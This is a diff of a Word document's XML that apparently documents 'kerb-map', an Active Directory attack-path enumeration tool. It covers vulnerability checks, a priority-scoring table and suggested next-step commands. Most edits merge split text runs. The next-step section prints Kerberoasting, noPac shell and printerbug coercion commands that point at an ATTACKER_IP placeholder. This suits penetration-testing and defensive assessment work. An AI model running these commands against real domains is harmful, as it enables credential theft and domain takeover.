-              <w:t xml:space="preserve"> Purpose EKU (OID 2.5.29.37.0) or no EKU restrictions at all. The resulting certificate can be used for any purpose including authentication.</w:t>
+              <w:t>Template has the Any Purpose EKU (OID 2.5.29.37.0) or no EKU restrictions at all. The resulting certificate can be used for any purpose including authentication.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11694,21 +10423,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="31" w:name="_Toc224561311"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>5.3  ZeroLogon</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> — CVE-2020-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1472  [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Aggressive]</w:t>
+      <w:r>
+        <w:t>5.3  ZeroLogon — CVE-2020-1472  [Aggressive]</w:t>
       </w:r>
       <w:bookmarkEnd w:id="31"/>
     </w:p>
@@ -11876,21 +10592,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="32" w:name="_Toc224561312"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>5.4  PrintNightmare</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> — CVE-2021-1675 / CVE-2021-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>34527  [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Aggressive]</w:t>
+      <w:r>
+        <w:t>5.4  PrintNightmare — CVE-2021-1675 / CVE-2021-34527  [Aggressive]</w:t>
       </w:r>
       <w:bookmarkEnd w:id="32"/>
     </w:p>
@@ -11913,21 +10616,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Detection: The module attempts to bind to the \pipe\spoolss named pipe over SMB. If the bind succeeds, the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>spooler</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is running and the DC is vulnerable.</w:t>
+        <w:t>Detection: The module attempts to bind to the \pipe\spoolss named pipe over SMB. If the bind succeeds, the spooler is running and the DC is vulnerable.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11939,35 +10628,7 @@
           <w:color w:val="333333"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Remediation: Disable </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>the Print</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Spooler service on all Domain Controllers. No DC should ever have a print </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>spooler</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> running.</w:t>
+        <w:t>Remediation: Disable the Print Spooler service on all Domain Controllers. No DC should ever have a print spooler running.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -12100,21 +10761,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="33" w:name="_Toc224561313"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>5.5  PetitPotam</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> — CVE-2021-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>36942  [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Aggressive]</w:t>
+      <w:r>
+        <w:t>5.5  PetitPotam — CVE-2021-36942  [Aggressive]</w:t>
       </w:r>
       <w:bookmarkEnd w:id="33"/>
     </w:p>
@@ -12156,21 +10804,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="34" w:name="_Toc224561314"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>5.6  MS</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>14-068 — CVE-2014-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>6324  [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>PAC Forgery]</w:t>
+      <w:r>
+        <w:t>5.6  MS14-068 — CVE-2014-6324  [PAC Forgery]</w:t>
       </w:r>
       <w:bookmarkEnd w:id="34"/>
     </w:p>
@@ -12205,15 +10840,7 @@
       <w:bookmarkStart w:id="35" w:name="_Toc224561315"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>6</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Scoring</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &amp; Priority Engine</w:t>
+        <w:t>6.  Scoring &amp; Priority Engine</w:t>
       </w:r>
       <w:bookmarkEnd w:id="35"/>
     </w:p>
@@ -12225,49 +10852,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">The scorer is the most operationally valuable component of kerb-map. After all modules </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>complete</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, it cross-correlates every finding into a single unified list ranked </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>by</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>exploitation priority</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>The scorer is the most operationally valuable component of kerb-map. After all modules complete, it cross-correlates every finding into a single unified list ranked by exploitation priority.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12286,13 +10871,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="36" w:name="_Toc224561316"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>6.1  How</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Findings Are Ranked</w:t>
+      <w:r>
+        <w:t>6.1  How Findings Are Ranked</w:t>
       </w:r>
       <w:bookmarkEnd w:id="36"/>
     </w:p>
@@ -13706,6 +12286,350 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Weak DC Encryption</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>65</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>None</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>DES Account</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>60</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>None</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Trust Abuse (forest)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>90</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Forest trust, no SID filter</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>CRITICAL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Trust Abuse (bidir)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>75</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Bidirectional, no SID filter</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -13723,13 +12647,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="37" w:name="_Toc224561317"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>6.2  Next</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Step Generation</w:t>
+      <w:r>
+        <w:t>6.2  Next Step Generation</w:t>
       </w:r>
       <w:bookmarkEnd w:id="37"/>
     </w:p>
@@ -13821,79 +12740,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">GetUserSPNs.py </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>jsmith:Password</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>123 -request-user svc_sql -</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>outputfile</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> svc_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sql.hash</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>GetUserSPNs.py corp.local/jsmith:Password123 -request-user svc_sql -outputfile svc_sql.hash</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -13985,47 +12833,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python noPac.py </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>lowpriv:Password</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc-ip 192.168.1.10 -shell</w:t>
+              <w:t>python noPac.py corp.local/lowpriv:Password -dc-ip 192.168.1.10 -shell</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14118,47 +12926,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python printerbug.py </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>jsmith:pass@WEBSERVER01.corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> &lt;ATTACKER_IP&gt;</w:t>
+              <w:t>python printerbug.py corp.local/jsmith:pass@WEBSERVER01.corp.local &lt;ATTACKER_IP&gt;</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14184,15 +12952,7 @@
       <w:bookmarkStart w:id="38" w:name="_Toc224561318"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>7</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Output</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &amp; Export</w:t>
+        <w:t>7.  Output &amp; Export</w:t>
       </w:r>
       <w:bookmarkEnd w:id="38"/>
     </w:p>
@@ -14204,13 +12964,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="39" w:name="_Toc224561319"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>7.1  Terminal</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Output</w:t>
+      <w:r>
+        <w:t>7.1  Terminal Output</w:t>
       </w:r>
       <w:bookmarkEnd w:id="39"/>
     </w:p>
@@ -14388,13 +13143,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="40" w:name="_Toc224561320"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>7.2  JSON</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Export (-o json)</w:t>
+      <w:r>
+        <w:t>7.2  JSON Export (-o json)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="40"/>
     </w:p>
@@ -14455,27 +13205,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith -p pass -o json</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p pass -o json</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14506,27 +13236,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t># Outputs: kerb-map_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>_20240115_143022.json</w:t>
+              <w:t># Outputs: kerb-map_corp.local_20240115_143022.json</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14641,13 +13351,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="41" w:name="_Toc224561321"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>7.3  BloodHound</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Export (-o bloodhound)</w:t>
+      <w:r>
+        <w:t>7.3  BloodHound Export (-o bloodhound)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="41"/>
     </w:p>
@@ -14659,7 +13364,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>Writes a BloodHound-compatible JSON file containing custom nodes for Kerberoastable and AS-REP Roastable accounts with the hasspn and dontreqpreauth properties set. This file can be imported directly into BloodHound for visual path analysis.</w:t>
